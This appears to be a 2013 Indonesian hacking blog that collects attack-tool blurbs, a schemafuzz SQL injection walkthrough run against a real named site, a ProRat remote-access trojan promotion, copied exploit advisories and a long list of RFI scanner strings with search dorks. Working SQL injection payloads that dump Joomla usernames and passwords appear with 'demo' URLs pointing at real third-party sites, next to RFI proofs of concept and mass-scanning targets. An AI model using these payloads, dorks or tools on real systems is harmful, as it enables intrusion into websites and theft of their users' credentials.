BLANKON FORENSIC: 2013

Selasa, 24 Desember 2013

Blackbuntu

Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security.

Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10 and work on reference Back|Track. It's created as a hobby.

Source

It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as Web/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module.
It's written in perl programming language and can be run either under *NIX or Windows platforms. Fuzzing modules supported in this version:

Download

DotDotPwn

Download

Armitage

Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Armitage organizes Metasploit’s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver.

For discovery, Armitage exposes several of Metasploit’s host management features. You can import hosts and launch scans to populate a database of targets. Armitage also visualizes the database of targets–you’ll always know which hosts you’re working with and where you have sessions.

Armitage assists with remote exploitation–providing features to automatically recommend exploits and even run active checks so you know which exploits will work. If these options fail, you can use the Hail Mary approach and unleash db_autopwn against your target database.

Requirements
To use Armitage, you need the following:
Linux or Windows
Java 1.6+
Metasploit Framework 3.5+
A configured database. Make sure you know the username, password, and host.

Download [Win]
Download [LiN/niX]

Source

Hexjector

Hexjector is an Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.

Features:
1.Check for SQL Injection Vulnerablities.
2.Pentest SQL Injection Vulnerablities.
3.Web Application Firewall Detector.
4.Scan For Admin Page

5.Manual Dump Function
6.Browser
7.SQL Injection Type Detection
8.Search For Vulnerable Sites by using Google Dork
9.MD5 Cracker

Download

SQL Injection With Schemafuzz

SQL Injection With Schemafuzz
=========================================================
Welcome to my tutorial by arianom KiLL-9 CrEw
Powered by kill-9.tk
==================================================================

[+] Pertama Kali yang anda butuhkan untuk hacking dengan schemafuzz adalah sebuah sistem operasi Linux, atau account ssh.
Schemafuzz ini dijalankan menggunakan python.
1. login ke account ssh kmu atau masuk ke terminal jika menggunakan linux
2. wget schemafuzz.py : wget http://undana.ac.id/images/upload/schemafuzz.py
3. mv schemafuzz.py f >> untuk memperpendek cmd
4. python f -h >> mengetahui option cmd

> ketik python f -h
Usage: python f [options] arianom[@]gmail[dot]com kill-9.tk
Modes:
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

1. python f --findcol -u "www.site.com/news.php?id=22"
2. python f --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
3. python f --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
4. python f --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db
5. python f --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db -T user -C name,pass
6. python f --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt

[x] Penetrasi ke target. oke, kita cari target........
target di dapat : http://akperpasuruan.com/index.php?list=berita&de=14

1. langkah pertama --findcol [mencari panjang kolom]

[root@su110 tmp]# python f --findcol -u "http://akperpasuruan.com/index.php?list=berita&de=14"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14--
[+] Evasion Used: "+" "--"
[+] 16:55:12
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!

2. langkah ke dua --info [melihat database]

[root@su110 tmp]# python f --info -u "http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 16:56:57
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: akperpas_db
User: akperpas_bagus@localhost
Version: 5.0.91-community

[+] Do we have Access to MySQL Database: No
[+] Do we have Access to Load_File: No

[-] 16:57:23
[-] Total URL Requests 3
[-] Done

Selengkapnya bisa di download disini
Request mas jhony utk tutorial schemafuzz

[x] Greats:
All KiLL-9 CrEw and IndonesianCoder Team, DarkCode, MC-CrEW , Magelang-Cyber CrEw, KPLI Kediri, JatimCom, and All Indonesian Hacker and You

Remote Administrator with ProRat

Prorat is one of RAT (Remote Administration Tools) are widely used to take over the computer system. Tool made by PRO Group, a group of Turkish hackers community, can be used as a tool Hacking computers in a network. Use of Prorat quite simple, you simply enter the IP (Internet Protocol) is the target computer and then go through one open port. The hardest part is finding where an open port. But you can use a variety of network analysis tools such as nmap, Ethercap, LookHost, etc..

Here are the features provided by PRORAT:
- Remote Control
- Viewing System Info, application running and the Task Manager
- Add process, file, or download files
- Admin FTP
- Format the HDD (hard disk damage)
- Remotely download
- Running MS-DOS, Batch Script, VBScript
- Adding a Registry Entry
- Keylogger: Password Recording
- Make Screnshoot, see your Windows desktop instantly
- Send messages and chat
- Shutdown, Restart, Control Panel, IExplorer, Registry, Printer and Online Controls

Download Prorat
or Download Prorat at here

DVWA Web Hacking

Damn Vulnerable Web Application (DVWA) is a collection of web hacking tool based on PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. Various techniques web hacking attacks can be obtained from this tool. Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.

DVWA include some web hacking tools such as:

- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute Force

Download DVWA

Joomla Component com_jsjobs Multiple SQL injection

#############################################################################################################
## Joomla Component com_jsjobs Multiple SQL injection vulnerability ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : december 9, 2009 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.joomshark.com/
[+] Download : http://www.joomsky.com/index.php?option=com_rokdownloads&view=file&task=download&id=23:js-jobs
[+] version : 1.0.5.6
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_jsjobs"
[+] LOCATION : INDONESIA - JOGJA
[+] Note : this extension have 2 categories .. free and commercial :D
[+] price : 20$
#############################################################################################################

[ HERE WE GO ... LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_company&vm=kaMz&md=[INDONESIANCODER]

http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=kaMtiEz&jobcat=Tukulesto&oi=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--

-666+union+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,version(),666,666,666,666,666,666,666,666,666,6666+from+jos_users--

[ Demo ]

http://jsjobsdemo.joomshark.com/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_company&vm=kaMz&md=-666+union+all+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--

http://www.vacaturezoektcv.nl/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=kaMtiEz&jobcat=Tukulesto&oi=-666+union+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,version(),666,666,666,666,666,666,666,666,666,6666+from+jos_users--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] selamat hari korupsi :D ..
[+] Tukulesto : xpl terossssssssssss ...
[+] Gh4mb4S : sabar yach .. pasti ada hasil .. hahhaa
[+] dimanakah keadilan di tanah airku tercinta ??

[ EOF ]
[+] INDONESIANCODER TEAM
[+] KILL -9 TEAM

Joomla Component MojoBlog Multiple Remote File Include vulnerability

#########################################################################
## Joomla Component MojoBlog Multiple Remote File Include vulnerability #
## Author : kaMtiEz (kamzcrew@yahoo.com) #
## Homepage : http://www.indonesiancoder.com #
## Date : November 20, 2009 #
#########################################################################

[ Software Information ]

[+] Vendor : http://www.joomlify.com/
[+] Download : http://www.joomlify.com/files/mojoblog/
[+] version : RC0.15
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_mojo"
[+] Location : INDONESIA - JOGJA

#########################################################################

[ Vulnerable File ]

http://127.0.0.1/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]

http://127.0.0.1/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]

[ BUG IN ]

[1] wp-comments-post.php

[2] wp-trackback.php

======================

[1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');

[2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');

[ FIX ]

contact me .. or aurakasih ..

Joke.. ;)
#########################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ]

[+] one day .. u will be mind ..
[+] bangun tidur coba mencari celah .. dapet juga ,, :D
[+] aurakasih .. aku butuh kamuwh .. hha
[+] om tukulesto kapan ke kotaku ?? hha

Joomla Component com_jphoto SQL injection vulnerability

#############################################################################################################
## Joomla Component com_jphoto SQL injection vulnerability - (id) ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : december 9, 2009 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.corephp.com/
[+] Download : http://www.corephp.com/component/option,com_rokdownloads/Itemid,100132/view,folder/ ( register first to download )
[+] About : http://www.corephp.com/jphoto/about.html
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_jphoto"
[+] LOCATION : INDONESIA - JOGJA
[+] price : -
#############################################################################################################
[ HERE WE GO ... LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_jphoto&view=category&id=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--

[ Demo ]

http://demo.davisservicesgroup.com/index.php?option=com_jphoto&view=category&id=-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--&Itemid=137

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] selamat hari korupsi :D ..
[+] syalalala ...

[ EOF ]
[+] INDONESIANCODER TEAM
[+] KILL -9 TEAM

Mamboleto Joomla! component Remote File Include Vulneralbility

/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulneralbility
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date : December 10, 2009
[!] Tune In : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em “legacy mode”.
Muito mais aprimorado com dois bancos a mais (Sicredi e Bancoob) e com um novo módulo de integração com o VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . ‘/administrator/components/com_mamboleto/include/pre.php’);

[ Proof of Concept ]

http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM – KILL-9 CREW – MainHack Brotherhood – ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ]

[>] FOR MALINGSIAL

[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : awas ada tukang =))
[+] arianom says : Kumpulkan Koin untuk Prita Mulyasari !!!
[+] Pathloader says : Oke lah kalau beg… beg… beg… begitu :D
[+] tiw0L says : Ojo di maem pleaseeeeee!!!
[+] kaMtiEz says : aku bukan HOMO <++++ Fitnah nih ga mau ngakuin :p

Oscommerce Online Merchant v2.2

Recode by arianom

[$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date : 30-05-2010
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : Remote File Upload
[$] Vendor : http://www.oscommerce.com
[$] Google Dork : n/a
[%] vulnerable file: /admin/file_manager.php
[$] Exploit: Download

Note:Open and edit script,
Change http://kill-9.org with your website target.
Then upload to shell or hosting. Run it and Resolve to the Target.
Good Luck,,Bro

Greats : All Kill-9 Crew and IndonesianCoder Team , Malang-Cyber Crew and You

Bug-Dork

!scan /ws/login.php?includedir= WebCalendar

!scan /ws/login.php?includedir= WebCalendar v0.9.45

!scan ocp-103/index.php?req_path= ocPortal

!scan images/evil.php?owned= e107

!scan index.php?module=PostWrap&page= PostNuke PostWrap

!scan mcNews/admin/header.php?skinfile= mcNews

!scan inc/download_center_lite.inc.php?script_root= "Download Center Lite"

!scan zboard/zboard.php?id= Zeroboard

!scan index.php?node=system&op=extop&ext=statman&eop=/visitor&ip= Nodez

!scan include/SQuery/gameSpy2.php?libpath= intitle:"Autonomous LAN party"

!scan event.php?myevent_path= MyEvent

!scan index.php?page= "Internet PhotoShow"

!scan mod/authent.php4?rootpath= RechnungsZentrale

!scan about.php?DFORUM_PATH= dForum

!scan post.php?DFORUM_PATH= dForum

!scan movie_cls.php?full_path= Built2Go

!scan /toplist.php?f=toplist_top10&phpbb_root_path= inurl:"toplist.php" "powered by phpbb"

!scan admin/addentry.php?phpbb_root_path= inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"

!scan /master.php?root_path= inurl:/system/article/alltopics.php

!scan /master.php?root_path= inurl:/system/user/index.php

!scan includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"

!scan /classes/adodbt/sql.php?classes_dir= inurl:"index2.php?option=rss"

!scan /classes/adodbt/sql.php?classes_dir= "powered By Limbo CMS"

!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"

!scan agenda.php3?rootagenda= "Powered by phpMyAgenda"

!scan agenda2.php3?rootagenda= "Powered by phpMyAgenda"

!scan show.php?path= inurl:"fclick.php?"

!scan eshow.php?Config_rootdir= "powered by Albinator"

!scan auction/auction_common.php?phpbb_root_path= intext:"phpbb - auction"

!scan auction/auction_common.php?phpbb_root_path= inurl:auction

!scan visible_count_inc.php?statitpath= inurl:visible

!scan index.php?inc_dir= "Powered by TotalCalendar"

!scan /phpdig/includes/config.php?relative_script_path= "JetBox CMS"

!scan embed/day.php?path= intitle:"Login to Calendar"

!scan includes/dbal.php?eqdkp_root_path= "powered by EQdkp"

!scan claroline/auth/ldap/authldap.php?includePath= Dokeos

!scan /direct.php?rf= "ActualScripts, Company. All rights reserved."

!scan /config.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"

!scan addsite.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"

!scan auth/auth.php?phpbb_root_path= phpRaid

!scan auth/auth_phpbb/phpbb_root_path= phpRaid

!scan includes/pafiledb_constants.php?module_root_path= PafileDB

!scan index.php?phpbb_root_path= "Powered by foing"

!scan extras/poll/poll.php?file_newsportal= "TR Newsportal" brought by TRanx.

!scan cart_content.php?cart_isp_root= inurl:/squirrelcart/

!scan ezusermanager_pwd_forgott.php?ezUserManager_Path= "powered by ezUserManager"

!scan includes/class_template.php?quezza_root_path= "Quezza BB"

!scan sources/news.php?CONFIG[main_path]= "Powered By ScozNews"

!scan classified_right.php?language_dir= phpbazar

!scan cron.php?ROOT_PATH= "powered by phpmydirectory"

!scan cron.php?ROOT_PATH= intext:"2001-2006 phpMyDirectory.com"

!scan reconfig.php?GLOBALS[CLPath]= "CaLogic Calendars"

!scan srxclr.php?GLOBALS[CLPath]= "CaLogic Calendars"

!scan sources/post.php?fil_config= "Fusion News"

!scan addpost_newpoll.php?addpoll=preview&thispath= allinurl:/ubbthreads/

!scan BE_config.php?_PSL[classdir]= "Back-End CMS"

!scan /index.php?site_path= "Powered by SocketMail"

!scan vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]= V-Webmail

!scan includes/mailaccess/pop3.php?CONFIG[pear_dir]= V-Webmail

!scan DOCEBO205/modules/credits/help.php?lang= "Docebo LMS"

!scan cached.php3?GLOBALS[AA_INC_PATH]= "APC ActionApps"

!scan jsview.php3?GLOBALS[AA_INC_PATH]= "APC ActionApps"

!scan auth.php3?GLOBALS[AA_INC_PATH]= "APC ActionApps"

!scan manager/frontinc/prepend.php?_PX_config[manager_path]= "Plume CMS"

!scan admin/lib_action_step.php?GLOBALS[CLASS_PATH]= "Hot Open Tickets"

!scan p-popupgallery.php?l= "F@cile Interactive Web"

!scan ubbt.inc.php?GLOBALS[thispath]= UBBThreads

!scan ubbt.inc.php?thispath= UBBThreads

!scan language/lang_english/lang_activity.php?phpbb_root_path= Activity MOD Plus phpBB

!scan blend_data/blend_common.php?phpbb_root_path= "Blend Portal"

!scan suche/search.php?config[fsBase]= "Fastpublish CMS"

!scan drucken.php?config[fsBase]= "Fastpublish CMS"

!scan includes/common.php?root_path= gnopaste

!scan error.php?default_path= "Ottoman CMS"

!scan app/edocument/edocument_basic_view_menu.php?system_path= metajour

!scan app/eproject/eproject_basic_view_menu.php?system_path= metajour

!scan app/erek/erek_basic_view_menu.php?system_path= metajour

!scan extension/article/article.class.php?system_path= metajour

!scan extension/search/search.class.php?system_path= metajour

!scan admin/menu.php?root_path= "AssoCIateD CMS"

!scan includes/webdav/server.php?bhconfig[bhfilepath]= Bytehoard

!scan include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]= "Redaxo CMS"

!scan class/Wiki/Wiki.php?c_node[class_path]= Igloo

!scan ashheadlines.php?pathtoashnews= "powered by ashnews"

!scan ashnews.php?pathtoashnews= "powered by ashnews"

!scan admin/common-menu.php?CONF[local_path]= Informium

!scan modules/Forums/admin/index.php?phpbb_root_path= PHP-Nuke

!scan modules/Forums/admin/admin_words.php?phpbb_root_path= PHP-Nuke

!scan modules/Forums/admin/admin_smilies.php?phpbb_root_path= PHP-Nuke

!scan modules/Forums/admin/admin_users.php?phpbb_root_path= "PHP-Nuke"

!scan applications/faq/Bs_Faq.class.php?APP[path][applications]= "BlueShoes Framework"

!scan applications/filemanager/file.php?APP[path][core]= "BlueShoes Framework"

!scan inc/logincheck.inc.php?path= Webspotblogging

!scan inc/global.php?path= Webspotblogging

!scan classes/phpmailer/class.cs_phpmailer.php?classes_dir= Powered by CS-Cart - Shopping Cart Software

!scan /index.php?file_path= "dotwidget Printer-friendly"

!scan /includes/common.inc?file_path= "dotwidget Printer-friendly"

!scan /auth.cookie.inc.php?da_path= "powered by DreamAccount"

!scan /auth.header.inc.php?da_path= "powered by DreamAccount"

!scan _wk/wk_lang.php?WK[wkPath]= Wikiwig

!scan contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]= OpenEMR

!scan sources/post.php?fil_config= Xtreme/Ditto News

!scan class/jpcache/jpcache.php?_PSL[classdir]= "Back-end CMS"

!scan dialogs/td.php?spaw_root= cms-bandits

!scan dialogs/img.php?spaw_root= cms-bandits

!scan footer.php?absolutepath= "Enterprise Payroll Systems"

!scan admin/footer.php?absolutepath= "Enterprise Payroll Systems"

!scan phpcodecabinet_directory/include/Beautifier/Core.php?BEAUT_PATH= PHPCodeCabinet

!scan calendar.php?cfg_dir= "Visual Events Calendar" <-- good

!scan includes/usercp_register.php?phpbb_root_path= ZoneX 1.0.3 - Publishers Gold Edition <-- good

!scan lib/auth.inc.php?INIT_PATH= docpile:we

!scan article-raw.php?file_newsportal= phNNTP

!scan genpage-cgi.php?REP_INC= Hitweb

!scan CheckUpload.php?Language= "Cwfm-0.9.1"

!scan boitenews4/index.php?url_index= "Boite de News"

!scan common.inc.php?CFG[libdir]= "PgMarket"

!scan owimg.php3?path= "See-Commerce"

!scan tags.php?BBCodeFile= Tagger

!scan examples/image.php?image= "powered by twg"

!scan examples/examples/image.php2?image= "powered by twg"

!scan include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id="

!scan src/Login.php?page= "Spaminator"

!scan config.php?root_path= Thatware <--- bagus

!scan index.php?page= SaveWebPortal

!scan inc/header.inc.php?ficStyle= phpPrintAnalyzer

!scan Classes/Event_for_month.php?_BASE= Chaussette

!scan install/install3.php?database=none&cabsolute_path= "WEBInsta Mailing list manager"

!scan BaseLoader.php?glConf[path_libraries]= MVCnPHP

!scan includes/session.php?wb_class_dir= Wheatblog

!scan index.php?templates_dir= "WEBinsta CMS" <-- bagus

!scan common.php?rootdir= projectbutler

!scan inc/indexhead.php?fileloc= discloser

!scan modules/usersonline/users.php?module_dir= "WEBinsta CMS" <-- bagus

!scan lib/specialdays.php?path_pre= "PHProjekt"

!scan lib/dbman_filter.inc.php?lib_path= "PHProjekt"

!scan classes/query.class.php?baseDir= dotProject

!scan include/urights.php?CRM_inc= Outreach Project Tool

!scan system/includes/pageheaderdefault.inc.php?_sysSessionPath= IRSR - Invisionix Roaming System Remote

!scan s03.php?shopid= powergap

!scan administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:"/com_mtree/"

!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"

!scan handlers/email/mod.listmail.php?_PM_[path][handler]= PHlyMail Lite

!scan app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= phpCodeGenie

!scan administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= inurl:"com_kochsuite"

!scan plugins/1_Adressbuch/delete.php?folder= Sonium Enterprise Adressbook

!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage

!scan admin/autoprompter.php?CONFIG[BASE_PATH]= Cce-interact

!scan includes/common.inc.php?CONFIG[BASE_PATH]= Cce-interact

!scan include/novalib/class.novaEdit.mysql.php?TNLIB_DIR= Tutti Nova

!scan news.php?CONFIG[script_path]= Fantastic News

!scan include/yapbb_session.php?GLOBALS[includeBit]=devilteam&cfgIncludeDirectory= YapBB

!scan local/lib/lcUser.php?LIBDIR= "Local Calendar"

!scan ?langage= EPNadmin

!scan themes/program/themesettings.inc.php?themesdir= "Segue CMS"

!scan lib/rs.php?rootpath= CASTOR

!scan phpcalendar/includes/setup.php?phpc_root_path= Virtual Law Office

Bug&Dork

!scan includes/ktedit/toolbar.php?dirDepth= ktmlpro

!scan ?custompluginfile%5B%5D= Subdreamer categoryid

!scan ?custompluginfile%5B%5D= "Website Powered by Subdreamer"

!scan include/lib.inc.php?site_path= rgboard

!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "/includes/mambo.php"

!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "mambo/index.php"

!scan demo1/auction_confirmation.inc.php/header.php?prefix= browse.php?id=?

!scan phpAdsNew/view.inc.php?phpAds_path= auction/index.php

!scan playing.php/common/db.php?commonpath= inurl:"playing.php"

!scan viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "Powered by phpBB 2.0" "Powered by phpBB 2.0"+org "Powered by phpBB 2.0" "Powered by phpBB 2.0"+hk

!scan errors.php?error= "index of" errors.php

!scan index.php?option=com_custompages&cpage= inurl:"com_custompages"

!scan index2.php?option=com_custompages&cpage= inurl:"com_custompages"

!scan mainbody.php?option=com_custompages&cpage= inurl:"com_custompages"

!scan editsite.php?returnpath= "editsite.php"

!scan slice.php3?GLOBALS[AA_INC_PATH]= slice.php3?GLOBALS[AA_INC_PATH]=

!scan files/carprss.php?CarpPath= "by SiteBuilder Elite"

!scan accounts/inc/include.php?language=0&lang_settings[0][1]= "Powered by IceWarp Software Merak Email Server" IceWarp Web Mail 5.4

!scan config.inc.php?path_escape= home "post ad" "post event" "post image"

!scan ipblock.inc.php?path_escape= home "post ad" "post event" "post image"

!scan ipblock.inc.php?path_escape= event(s) today "All Upcoming Events"

!scan ws/login.php?noSet=0&includedir= "Public Access (Login)" WebCalendar

!scan vwar/convert/mvcw.php?step=1&vwar_root= "de/vwar"

!scan protection.php?action=logout&siteurl= "approved by TheFanlistings.org"

!scan ?mosConfig_absolute_path= "Free Software released under the GNU/GPL License"

!scan ?mosConfig_absolute_path= Joomla Template by

!scan plugins/spamx/MassDelete.Admin.class.php?_CONF[path]= "All trademarks and copyrights on this page are owned by their respective owners" Geeklog

!scan plugins/spamx/MailAdmin.Action.class.php?_CONF[path]= "Powered By GeekLog" "Created this page in" seconds

!scan admin.php?include_path= "Teken het gastenboek" Onderhoud

!scan includes/db_connect.php?baseDir= "Version 2.0.4 "You must have cookies enabled in your browser"

!scan bookmark4u/lostpasswd.php?env[include_prefix]= bookmark4u

!scan index.php?a= ".de/index.php?a="

!scan index.php?skin_file= "Powered by Mp3ToolBox

!scan index.php?filename= "35mm Slide Gallery 6.0"

!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "/members.php?id=all" >> mulai

!scan protection.php?action=logout&siteurl= "/members.php?id=all"

!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "ID" "Name" "Email" "URL"

!scan accueil.php?menu= "asso.fr/accueil.php?menu="

!scan comments-display-tpl.php?config[comments_form_tpl]= "Powered By TalkBack"

!scan /?file= inurl:?/?file=contact? intext:?About Us? -cfm -asp -index.php -.cgi -aspx mulai

!scan modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= ".php?name=Forums"

!scan modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= PNphpBB2

